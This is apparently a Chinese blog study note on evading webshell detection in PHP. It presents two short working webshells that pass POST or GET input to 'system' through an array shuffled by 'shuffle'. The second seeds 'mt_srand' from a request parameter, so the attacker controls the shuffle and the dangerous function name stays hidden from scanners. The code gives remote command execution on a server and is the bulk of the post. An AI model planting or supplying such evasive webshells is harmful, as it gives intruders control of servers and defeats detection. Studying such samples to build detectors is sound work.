记一次学习--webshell绕过(利用清洗函数)

目录

样本

样本修改


样本

php 复制代码
<?php
$a = array("t", "system");
shuffle($a);
$a[0]($_POST[1]);

通过 shuffle 函数打乱数组,然后通过$a[0]取出第一个元素,打乱后第一个元素可能是t也可能是system。然后再进行POST传参进行命令执行。

这里抓包可以正常执行

样本修改

对于shuffle函数来说,他的随机是伪随机,我们可以通过对其代码的分析然后预测数组中元素打乱的规律。对于sheuffle来说底层调用的是mt_rand来生成随机值,以次控制打乱的数组中的元素的顺序。然后对于mt_rand来说当他的种子定好他的随机值就不会发生改变了。

php 复制代码
<?php
$arr = array("t","a","s","system");
function shift(&$arr){
mt_srand($_GET[0]);
shuffle($arr);
}
shift($arr);
$arr[2]($_GET[1]);
相关推荐
im长街8 分钟前
Ubuntu22.04 - brpc的安装和使用
学习
知识分享小能手13 分钟前
Html5学习教程,从入门到精通,HTML5 简介语法知识点及案例代码(1)
开发语言·前端·javascript·学习·前端框架·html·html5
Hacker_Fuchen27 分钟前
ctf网络安全题库 ctf网络安全大赛答案
安全·web安全
你可以叫我仔哥呀2 小时前
k8s学习记录:环境搭建(基于Kubeadmin)
学习·容器·kubernetes
试试看1682 小时前
自制操作系统前置知识汇编学习
汇编·学习
EnigmaCoder2 小时前
单链表:数据结构中的灵活“链条”
c语言·数据结构·学习
南宫生3 小时前
力扣每日一题【算法学习day.130】
java·学习·算法·leetcode
南宫生3 小时前
力扣每日一题【算法学习day.133】
java·学习·算法·leetcode
jingwang-cs4 小时前
内外网文件传输 安全、可控、便捷的跨网数据传输方案
人工智能·后端·安全
C语言扫地僧4 小时前
RPC 框架项目剖析
c++·网络协议·学习·rpc